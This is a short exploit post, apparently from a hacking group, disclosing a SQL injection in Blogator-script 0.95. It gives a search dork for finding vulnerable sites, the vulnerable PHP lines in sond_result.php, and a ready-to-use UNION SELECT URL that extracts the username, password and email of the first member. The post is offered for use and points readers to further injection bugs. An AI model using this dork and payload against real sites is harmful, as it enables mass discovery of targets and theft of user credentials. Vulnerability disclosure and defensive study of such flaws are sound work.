########################################################################

             #                                                                  
    #

             #    ...:::::Blogator-script 0.95 SQL Injection Vulnerbility 
::::....  #           

             
########################################################################


Virangar Security Team


www.virangar.org

www.virangar.net


--------

Discoverd By :virangar security team(hadihadi)


special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra


& all virangar members & all hackerz


greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

-----------------------------------

dork: inurl:/_blogadata/

-----------------------------------

vuln code in /_blogadata/include/sond_result.php:

line 27: $id_art=$_GET['id_art'];

......

line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM 
sondage_rep WHERE id_sond = $id_art ORDER BY ordre");

------------

vuln:

http://www.site.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*

--------------------------------

you can see in Blogator-script other injection bugs too ;)

Reply via email to